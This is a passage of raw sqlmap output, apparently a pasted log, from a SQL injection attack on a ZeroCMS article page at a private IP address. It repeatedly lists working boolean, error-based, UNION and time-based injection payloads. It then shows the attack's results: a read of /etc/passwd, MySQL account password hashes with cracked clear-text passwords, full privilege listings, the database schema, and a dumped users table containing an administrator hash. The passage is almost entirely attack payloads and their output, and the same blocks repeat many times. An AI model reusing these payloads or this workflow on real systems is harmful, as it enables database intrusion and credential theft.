  504. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  505.  
  506. Type: UNION query
  507. Title: MySQL UNION query (NULL) - 6 columns
  508. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  509.  
  510. Type: AND/OR time-based blind
  511. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  512. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  513. ---
  514. web server operating system: Linux Debian 7.0 (wheezy)
  515. web application technology: Apache 2.2.22, PHP 5.4.4
  516. back-end DBMS: MySQL 5
  517. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  518. ---
  519. Parameter: #1* (URI)
  520. Type: boolean-based blind
  521. Title: AND boolean-based blind - WHERE or HAVING clause
  522. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  523.  
  524. Type: error-based
  525. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  526. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  527.  
  528. Type: UNION query
  529. Title: MySQL UNION query (NULL) - 6 columns
  530. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  531.  
  532. Type: AND/OR time-based blind
  533. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  534. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  535. ---
  536. web server operating system: Linux Debian 7.0 (wheezy)
  537. web application technology: Apache 2.2.22, PHP 5.4.4
  538. back-end DBMS: MySQL 5
  539. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  540. ---
  541. Parameter: #1* (URI)
  542. Type: boolean-based blind
  543. Title: AND boolean-based blind - WHERE or HAVING clause
  544. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  545.  
  546. Type: error-based
  547. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  548. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  549.  
  550. Type: UNION query
  551. Title: MySQL UNION query (NULL) - 6 columns
  552. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  553.  
  554. Type: AND/OR time-based blind
  555. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  556. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  557. ---
  558. web server operating system: Linux Debian 7.0 (wheezy)
  559. web application technology: Apache 2.2.22, PHP 5.4.4
  560. back-end DBMS: MySQL 5
  561. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  562. ---
  563. Parameter: #1* (URI)
  564. Type: boolean-based blind
  565. Title: AND boolean-based blind - WHERE or HAVING clause
  566. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  567.  
  568. Type: error-based
  569. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  570. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  571.  
  572. Type: UNION query
  573. Title: MySQL UNION query (NULL) - 6 columns
  574. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  575.  
  576. Type: AND/OR time-based blind
  577. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  578. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  579. ---
  580. web server operating system: Linux Debian 7.0 (wheezy)
  581. web application technology: Apache 2.2.22, PHP 5.4.4
  582. back-end DBMS: MySQL 5
  583. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  584. ---
  585. Parameter: #1* (URI)
  586. Type: boolean-based blind
  587. Title: AND boolean-based blind - WHERE or HAVING clause
  588. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  589.  
  590. Type: error-based
  591. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  592. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  593.  
  594. Type: UNION query
  595. Title: MySQL UNION query (NULL) - 6 columns
  596. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  597.  
  598. Type: AND/OR time-based blind
  599. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  600. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  601. ---
  602. web server operating system: Linux Debian 7.0 (wheezy)
  603. web application technology: Apache 2.2.22, PHP 5.4.4
  604. back-end DBMS: MySQL 5
  605. files saved to [1]:
  606. [*] /root/.sqlmap/output/10.100.101.130/files/_etc_passwd (same file)
  607.  
  608. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  609. ---
  610. Parameter: #1* (URI)
  611. Type: boolean-based blind
  612. Title: AND boolean-based blind - WHERE or HAVING clause
  613. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  614.  
  615. Type: error-based
  616. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  617. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  618.  
  619. Type: UNION query
  620. Title: MySQL UNION query (NULL) - 6 columns
  621. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  622.  
  623. Type: AND/OR time-based blind
  624. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  625. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  626. ---
  627. web server operating system: Linux Debian 7.0 (wheezy)
  628. web application technology: Apache 2.2.22, PHP 5.4.4
  629. back-end DBMS: MySQL 5
  630. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  631. ---
  632. Parameter: #1* (URI)
  633. Type: boolean-based blind
  634. Title: AND boolean-based blind - WHERE or HAVING clause
  635. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  636.  
  637. Type: error-based
  638. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  639. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  640.  
  641. Type: UNION query
  642. Title: MySQL UNION query (NULL) - 6 columns
  643. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  644.  
  645. Type: AND/OR time-based blind
  646. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  647. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  648. ---
  649. web server operating system: Linux Debian 7.0 (wheezy)
  650. web application technology: Apache 2.2.22, PHP 5.4.4
  651. back-end DBMS: MySQL 5
  652. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  653. ---
  654. Parameter: #1* (URI)
  655. Type: boolean-based blind
  656. Title: AND boolean-based blind - WHERE or HAVING clause
  657. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  658.  
  659. Type: error-based
  660. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  661. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  662.  
  663. Type: UNION query
  664. Title: MySQL UNION query (NULL) - 6 columns
  665. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  666.  
  667. Type: AND/OR time-based blind
  668. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  669. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  670. ---
  671. web server operating system: Linux Debian 7.0 (wheezy)
  672. web application technology: Apache 2.2.22, PHP 5.4.4
  673. back-end DBMS: MySQL 5
  674. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  675. ---
  676. Parameter: #1* (URI)
  677. Type: boolean-based blind
  678. Title: AND boolean-based blind - WHERE or HAVING clause
  679. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  680.  
  681. Type: error-based
  682. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  683. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  684.  
  685. Type: UNION query
  686. Title: MySQL UNION query (NULL) - 6 columns
  687. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  688.  
  689. Type: AND/OR time-based blind
  690. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  691. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  692. ---
  693. web server operating system: Linux Debian 7.0 (wheezy)
  694. web application technology: Apache 2.2.22, PHP 5.4.4
  695. back-end DBMS: MySQL 5
  696. banner: '5.5.38-0+wheezy1'
  697. current user: 'root@%'
  698. current database: 'zerocms'
  699. hostname: 'mysql'
  700. current user is DBA: True
  701. database management system users [1]:
  702. [*] 'root'@'localhost'
  703.  
  704. database management system users password hashes:
  705. [*] debian-sys-maint [1]:
  706. password hash: *9871EDA3E80AE14784EC40F1DD72B99881C5D718
  707. [*] pma [1]:
  708. password hash: *03E2854B1BC2353C7FED1F780C55F7845322DC57
  709. [*] root [1]:
  710. password hash: *4AD47E08DAE2BD4F0977EED5D23DC901359DF617
  711. clear-text password: abcd1234
  712. [*] zerocmsuser [1]:
  713. password hash: *4AD47E08DAE2BD4F0977EED5D23DC901359DF617
  714. clear-text password: abcd1234
  715.  
  716. database management system users privileges:
  717. [*] 'debian-sys-maint'@'localhost' (administrator) [28]:
  718. privilege: ALTER
  719. privilege: ALTER ROUTINE
  720. privilege: CREATE
  721. privilege: CREATE ROUTINE
  722. privilege: CREATE TABLESPACE
  723. privilege: CREATE TEMPORARY TABLES
  724. privilege: CREATE USER
  725. privilege: CREATE VIEW
  726. privilege: DELETE
  727. privilege: DROP
  728. privilege: EVENT
  729. privilege: EXECUTE
  730. privilege: FILE
  731. privilege: INDEX
  732. privilege: INSERT
  733. privilege: LOCK TABLES
  734. privilege: PROCESS
  735. privilege: REFERENCES
  736. privilege: RELOAD
  737. privilege: REPLICATION CLIENT
  738. privilege: REPLICATION SLAVE
  739. privilege: SELECT
  740. privilege: SHOW DATABASES
  741. privilege: SHOW VIEW
  742. privilege: SHUTDOWN
  743. privilege: SUPER
  744. privilege: TRIGGER
  745. privilege: UPDATE
  746. [*] 'pma'@'localhost' [1]:
  747. privilege: USAGE
  748. [*] 'root'@'::1' (administrator) [21]:
  749. privilege: ALTER
  750. privilege: CREATE
  751. privilege: CREATE TEMPORARY TABLES
  752. privilege: CREATE VIEW
  753. privilege: DELETE
  754. privilege: DROP
  755. privilege: EXECUTE
  756. privilege: FILE
  757. privilege: INDEX
  758. privilege: INSERT
  759. privilege: LOCK TABLES
  760. privilege: PROCESS
  761. privilege: REFERENCES
  762. privilege: RELOAD
  763. privilege: REPLICATION CLIENT
  764. privilege: REPLICATION SLAVE
  765. privilege: SELECT
  766. privilege: SHOW DATABASES
  767. privilege: SHUTDOWN
  768. privilege: SUPER
  769. privilege: UPDATE
  770. [*] 'root'@'localhost' (administrator) [28]:
  771. privilege: ALTER
  772. privilege: ALTER ROUTINE
  773. privilege: CREATE
  774. privilege: CREATE ROUTINE
  775. privilege: CREATE TABLESPACE
  776. privilege: CREATE TEMPORARY TABLES
  777. privilege: CREATE USER
  778. privilege: CREATE VIEW
  779. privilege: DELETE
  780. privilege: DROP
  781. privilege: EVENT
  782. privilege: EXECUTE
  783. privilege: FILE
  784. privilege: INDEX
  785. privilege: INSERT
  786. privilege: LOCK TABLES
  787. privilege: PROCESS
  788. privilege: REFERENCES
  789. privilege: RELOAD
  790. privilege: REPLICATION CLIENT
  791. privilege: REPLICATION SLAVE
  792. privilege: SELECT
  793. privilege: SHOW DATABASES
  794. privilege: SHOW VIEW
  795. privilege: SHUTDOWN
  796. privilege: SUPER
  797. privilege: TRIGGER
  798. privilege: UPDATE
  799. [*] 'zerocmsuser'@'10.100.101.130' [1]:
  800. privilege: USAGE
  801. [*] 'zerocmsuser'@'localhost' [1]:
  802. privilege: USAGE
  803.  
  804. database management system users roles:
  805. [*] 'debian-sys-maint'@'localhost' (administrator) [28]:
  806. role: ALTER
  807. role: ALTER ROUTINE
  808. role: CREATE
  809. role: CREATE ROUTINE
  810. role: CREATE TABLESPACE
  811. role: CREATE TEMPORARY TABLES
  812. role: CREATE USER
  813. role: CREATE VIEW
  814. role: DELETE
  815. role: DROP
  816. role: EVENT
  817. role: EXECUTE
  818. role: FILE
  819. role: INDEX
  820. role: INSERT
  821. role: LOCK TABLES
  822. role: PROCESS
  823. role: REFERENCES
  824. role: RELOAD
  825. role: REPLICATION CLIENT
  826. role: REPLICATION SLAVE
  827. role: SELECT
  828. role: SHOW DATABASES
  829. role: SHOW VIEW
  830. role: SHUTDOWN
  831. role: SUPER
  832. role: TRIGGER
  833. role: UPDATE
  834. [*] 'pma'@'localhost' [1]:
  835. role: USAGE
  836. [*] 'root'@'::1' (administrator) [21]:
  837. role: ALTER
  838. role: CREATE
  839. role: CREATE TEMPORARY TABLES
  840. role: CREATE VIEW
  841. role: DELETE
  842. role: DROP
  843. role: EXECUTE
  844. role: FILE
  845. role: INDEX
  846. role: INSERT
  847. role: LOCK TABLES
  848. role: PROCESS
  849. role: REFERENCES
  850. role: RELOAD
  851. role: REPLICATION CLIENT
  852. role: REPLICATION SLAVE
  853. role: SELECT
  854. role: SHOW DATABASES
  855. role: SHUTDOWN
  856. role: SUPER
  857. role: UPDATE
  858. [*] 'root'@'localhost' (administrator) [28]:
  859. role: ALTER
  860. role: ALTER ROUTINE
  861. role: CREATE
  862. role: CREATE ROUTINE
  863. role: CREATE TABLESPACE
  864. role: CREATE TEMPORARY TABLES
  865. role: CREATE USER
  866. role: CREATE VIEW
  867. role: DELETE
  868. role: DROP
  869. role: EVENT
  870. role: EXECUTE
  871. role: FILE
  872. role: INDEX
  873. role: INSERT
  874. role: LOCK TABLES
  875. role: PROCESS
  876. role: REFERENCES
  877. role: RELOAD
  878. role: REPLICATION CLIENT
  879. role: REPLICATION SLAVE
  880. role: SELECT
  881. role: SHOW DATABASES
  882. role: SHOW VIEW
  883. role: SHUTDOWN
  884. role: SUPER
  885. role: TRIGGER
  886. role: UPDATE
  887. [*] 'zerocmsuser'@'10.100.101.130' [1]:
  888. role: USAGE
  889. [*] 'zerocmsuser'@'localhost' [1]:
  890. role: USAGE
  891.  
  892. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  893. ---
  894. Parameter: #1* (URI)
  895. Type: boolean-based blind
  896. Title: AND boolean-based blind - WHERE or HAVING clause
  897. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  898.  
  899. Type: error-based
  900. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  901. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  902.  
  903. Type: UNION query
  904. Title: MySQL UNION query (NULL) - 6 columns
  905. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  906.  
  907. Type: AND/OR time-based blind
  908. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  909. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  910. ---
  911. web server operating system: Linux Debian 7.0 (wheezy)
  912. web application technology: Apache 2.2.22, PHP 5.4.4
  913. back-end DBMS: MySQL 5
  914. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  915. ---
  916. Parameter: #1* (URI)
  917. Type: boolean-based blind
  918. Title: AND boolean-based blind - WHERE or HAVING clause
  919. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  920.  
  921. Type: error-based
  922. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  923. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  924.  
  925. Type: UNION query
  926. Title: MySQL UNION query (NULL) - 6 columns
  927. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  928.  
  929. Type: AND/OR time-based blind
  930. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  931. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  932. ---
  933. web server operating system: Linux Debian 7.0 (wheezy)
  934. web application technology: Apache 2.2.22, PHP 5.4.4
  935. back-end DBMS: MySQL 5
  936. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  937. ---
  938. Parameter: #1* (URI)
  939. Type: boolean-based blind
  940. Title: AND boolean-based blind - WHERE or HAVING clause
  941. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  942.  
  943. Type: error-based
  944. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  945. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  946.  
  947. Type: UNION query
  948. Title: MySQL UNION query (NULL) - 6 columns
  949. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  950.  
  951. Type: AND/OR time-based blind
  952. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  953. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  954. ---
  955. web server operating system: Linux Debian 7.0 (wheezy)
  956. web application technology: Apache 2.2.22, PHP 5.4.4
  957. back-end DBMS: MySQL 5
  958. sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
  959. ---
  960. Parameter: #1* (URI)
  961. Type: boolean-based blind
  962. Title: AND boolean-based blind - WHERE or HAVING clause
  963. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
  964.  
  965. Type: error-based
  966. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  967. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  968.  
  969. Type: UNION query
  970. Title: MySQL UNION query (NULL) - 6 columns
  971. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
  972.  
  973. Type: AND/OR time-based blind
  974. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  975. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
  976. ---
  977. web server operating system: Linux Debian 7.0 (wheezy)
  978. web application technology: Apache 2.2.22, PHP 5.4.4
  979. back-end DBMS: MySQL 5.0
  980. Database: zerocms
  981. [4 tables]
  982. +--------------------+
  983. | zero_access_levels |
  984. | zero_articles |
  985. | zero_comments |
  986. | zero_users |
  987. +--------------------+
  988.  
  989. Database: zerocms
  990. Table: zero_articles
  991. [7 columns]
  992. +--------------+------------------+
  993. | Column | Type |
  994. +--------------+------------------+
  995. | article_id | int(10) unsigned |
  996. | article_text | mediumtext |
  997. | is_published | tinyint(1) |
  998. | publish_date | datetime |
  999. | submit_date | datetime |
  1000. | title | varchar(255) |
  1001. | user_id | int(10) unsigned |
  1002. +--------------+------------------+
  1003.  
  1004. Database: zerocms
  1005. Table: zero_access_levels
  1006. [2 columns]
  1007. +--------------+---------------------+
  1008. | Column | Type |
  1009. +--------------+---------------------+
  1010. | access_level | tinyint(3) unsigned |
  1011. | access_name | varchar(50) |
  1012. +--------------+---------------------+
  1013.  
  1014. Database: zerocms
  1015. Table: zero_comments
  1016. [5 columns]
  1017. +--------------+------------------+
  1018. | Column | Type |
  1019. +--------------+------------------+
  1020. | article_id | int(10) unsigned |
  1021. | comment_date | datetime |
  1022. | comment_id | int(10) unsigned |
  1023. | comment_text | mediumtext |
  1024. | user_id | int(10) unsigned |
  1025. +--------------+------------------+
  1026.  
  1027. Database: zerocms
  1028. Table: zero_users
  1029. [5 columns]
  1030. +--------------+---------------------+
  1031. | Column | Type |
  1032. +--------------+---------------------+
  1033. | access_level | tinyint(3) unsigned |
  1034. | email | varchar(100) |
  1035. | name | varchar(100) |
  1036. | password | char(41) |
  1037. | user_id | int(10) unsigned |
  1038. +--------------+---------------------+
  1039.  
  1040. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1041. ---
  1042. Parameter: #1* (URI)
  1043. Type: boolean-based blind
  1044. Title: AND boolean-based blind - WHERE or HAVING clause
  1045. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
  1046.  
  1047. Type: error-based
  1048. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1049. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1050.  
  1051. Type: UNION query
  1052. Title: MySQL UNION query (NULL) - 6 columns
  1053. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
  1054.  
  1055. Type: AND/OR time-based blind
  1056. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  1057. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
  1058. ---
  1059. web server operating system: Linux Debian 7.0 (wheezy)
  1060. web application technology: Apache 2.2.22, PHP 5.4.4
  1061. back-end DBMS: MySQL >= 5.0.0
  1062. Database: zerocms
  1063. [4 tables]
  1064. +--------------------+
  1065. | zero_access_levels |
  1066. | zero_articles |
  1067. | zero_comments |
  1068. | zero_users |
  1069. +--------------------+
  1070.  
  1071. Database: zerocms
  1072. Table: zero_articles
  1073. [7 columns]
  1074. +--------------+------------------+
  1075. | Column | Type |
  1076. +--------------+------------------+
  1077. | article_id | int(10) unsigned |
  1078. | article_text | mediumtext |
  1079. | is_published | tinyint(1) |
  1080. | publish_date | datetime |
  1081. | submit_date | datetime |
  1082. | title | varchar(255) |
  1083. | user_id | int(10) unsigned |
  1084. +--------------+------------------+
  1085.  
  1086. Database: zerocms
  1087. Table: zero_access_levels
  1088. [2 columns]
  1089. +--------------+---------------------+
  1090. | Column | Type |
  1091. +--------------+---------------------+
  1092. | access_level | tinyint(3) unsigned |
  1093. | access_name | varchar(50) |
  1094. +--------------+---------------------+
  1095.  
  1096. Database: zerocms
  1097. Table: zero_comments
  1098. [5 columns]
  1099. +--------------+------------------+
  1100. | Column | Type |
  1101. +--------------+------------------+
  1102. | article_id | int(10) unsigned |
  1103. | comment_date | datetime |
  1104. | comment_id | int(10) unsigned |
  1105. | comment_text | mediumtext |
  1106. | user_id | int(10) unsigned |
  1107. +--------------+------------------+
  1108.  
  1109. Database: zerocms
  1110. Table: zero_users
  1111. [5 columns]
  1112. +--------------+---------------------+
  1113. | Column | Type |
  1114. +--------------+---------------------+
  1115. | access_level | tinyint(3) unsigned |
  1116. | email | varchar(100) |
  1117. | name | varchar(100) |
  1118. | password | char(41) |
  1119. | user_id | int(10) unsigned |
  1120. +--------------+---------------------+
  1121.  
  1122. Database: zerocms
  1123. Table: zero_access_levels
  1124. [3 entries]
  1125. +---------------+--------------+
  1126. | access_name | access_level |
  1127. +---------------+--------------+
  1128. | User | 1 |
  1129. | Moderator | 2 |
  1130. | Administrator | 3 |
  1131. +---------------+--------------+
  1132.  
  1133. Database: zerocms
  1134. Table: zero_articles
  1135. [1 entry]
  1136. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1137. | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
  1138. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1139. | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
  1140. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1141.  
  1142. Database: zerocms
  1143. Table: zero_comments
  1144. [0 entries]
  1145. +---------+------------+------------+--------------+--------------+
  1146. | user_id | comment_id | article_id | comment_date | comment_text |
  1147. +---------+------------+------------+--------------+--------------+
  1148. +---------+------------+------------+--------------+--------------+
  1149.  
  1150. Database: zerocms
  1151. Table: zero_users
  1152. [4 entries]
  1153. +---------+---------------+--------------------+------------------------------------------------------+--------------+
  1154. | user_id | name | email | password | access_level |
  1155. +---------+---------------+--------------------+------------------------------------------------------+--------------+
  1156. | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) | 3 |
